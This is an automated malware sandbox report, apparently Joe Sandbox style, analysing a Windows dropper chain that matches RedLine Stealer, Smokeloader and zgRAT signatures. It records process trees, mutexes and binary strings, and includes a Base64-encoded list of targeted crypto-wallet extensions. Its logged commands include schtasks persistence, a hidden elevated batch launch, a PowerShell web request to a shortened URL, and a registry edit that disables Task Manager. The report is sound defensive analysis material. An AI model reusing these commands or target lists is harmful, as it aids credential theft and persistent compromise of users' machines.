Source: 00000025.00000002.3789215805.00000000004F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 00000021.00000002.2005592482.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000021.00000002.2007530947.0000000002521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: whiteheroin[1].exe.10.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TpWWMUpe0LEV.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 7.exe.1.dr	Static PE information: Section: ZLIB complexity 0.9982923497267759
Source: 7.exe.1.dr	Static PE information: Section: tpchzztf ZLIB complexity 0.9944799030842137
Source: axplong.exe.9.dr	Static PE information: Section: ZLIB complexity 0.9982923497267759
Source: axplong.exe.9.dr	Static PE information: Section: tpchzztf ZLIB complexity 0.9944799030842137
Source: alex5555555[1].exe.10.dr	Static PE information: Section: .data ZLIB complexity 0.9966749058380414
Source: alex5555555.exe.10.dr	Static PE information: Section: .data ZLIB complexity 0.9966749058380414

Source: 36.2.alex5555555.exe.a1fda6.3.raw.unpack, BrEx.cs

Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@106/85@21/19

Source: C:\Users\user\Desktop\1Vkf7silOj.exe

File created: C:\Users\user\AppData\Local\SystemCache

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8560
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5208:64:WilError_03
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8812:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:8608:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7752
Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	Mutant created: \Sessions\1\BaseNamedObjects\a03ea6be66b88abc0318b34930b03a18

Source: C:\Users\user\Desktop\1Vkf7silOj.exe

File created: C:\Users\user\AppData\Local\Temp\6.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe

File opened: C:\Windows\system32\f0dd44904ddd0587eb760ebc1ed9b0f07e5591dbcf3ff63ac8329ad5f058909cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe

Process created: C:\Windows\System32\cmd.exe cmd /c ins.bat

Source: 1Vkf7silOj.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1Vkf7silOj.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\1Vkf7silOj.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\1Vkf7silOj.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"

Source: aspnet_regiis.exe, 00000036.00000002.2156414018.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2140127734.000000001D2B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2160559519.000000006CDFF000.00000002.00000001.01000000.00000021.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: aspnet_regiis.exe, 00000036.00000002.2156414018.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2140127734.000000001D2B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2160559519.000000006CDFF000.00000002.00000001.01000000.00000021.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: aspnet_regiis.exe, 00000036.00000002.2156414018.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2140127734.000000001D2B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2160559519.000000006CDFF000.00000002.00000001.01000000.00000021.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: aspnet_regiis.exe, 00000036.00000002.2156414018.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2140127734.000000001D2B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2160559519.000000006CDFF000.00000002.00000001.01000000.00000021.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: aspnet_regiis.exe, 00000036.00000002.2156414018.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2140127734.000000001D2B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2160559519.000000006CDFF000.00000002.00000001.01000000.00000021.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: aspnet_regiis.exe, 00000036.00000002.2156414018.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2140127734.000000001D2B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: aspnet_regiis.exe, 00000036.00000002.2156414018.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2140127734.000000001D2B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2160559519.000000006CDFF000.00000002.00000001.01000000.00000021.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 123.exe, 00000028.00000002.2069186496.000000000333E000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.000000000323A000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000003223000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000003248000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.000000000334C000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000003326000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000003.2026804870.00000000030E5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000003.2039372143.00000000236B6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000003.2027021313.00000000236C4000.00000004.00000020.00020000.00000000.sdmp, BFBKFHIDHIIJJKECGHCF.54.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: aspnet_regiis.exe, 00000036.00000002.2156414018.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2140127734.000000001D2B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: aspnet_regiis.exe, 00000036.00000002.2156414018.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2140127734.000000001D2B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: 1Vkf7silOj.exe	ReversingLabs: Detection: 68%
Source: 1Vkf7silOj.exe	Virustotal: Detection: 63%

Source: 7.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\1Vkf7silOj.exe "C:\Users\user\Desktop\1Vkf7silOj.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1lLub
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1880,i,1559005208409857201,3821663929955985099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process created: C:\Users\user\AppData\Local\Temp\6.exe "C:\Users\user~1\AppData\Local\Temp\6.exe"
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process created: C:\Users\user\AppData\Local\Temp\7.exe "C:\Users\user~1\AppData\Local\Temp\7.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe C:\Users\user~1\AppData\Local\Temp\8254624243\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\7.exe	Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user~1\AppData\Local\Temp\8254624243\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000035001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7752 -ip 7752
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7752 -s 320
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe "C:\Users\user~1\AppData\Local\Temp\1000064001\NewLatest.exe"
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Process created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe "C:\Users\user~1\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe C:\Users\user~1\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe "C:\Users\user~1\AppData\Local\Temp\1000091001\Installer.exe"
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ins.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://starjod.xyz/Website.php
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://starjod.xyz/Website.php
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1992,i,12647430490960773708,190328804482566679,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1844,i,568275399353426171,11183762438970494550,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe "C:\Users\user~1\AppData\Local\Temp\1000108001\ldr.exe"
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000020001\1.exe "C:\Users\user~1\AppData\Local\Temp\1000020001\1.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	Process created: C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe "C:\Users\user~1\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe "C:\Users\user~1\AppData\Local\Temp\1000109001\alex5555555.exe"
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 8560 -ip 8560
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8560 -s 284
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000110001\123.exe "C:\Users\user~1\AppData\Local\Temp\1000110001\123.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe "C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe "C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\install.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe "C:\Users\user~1\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
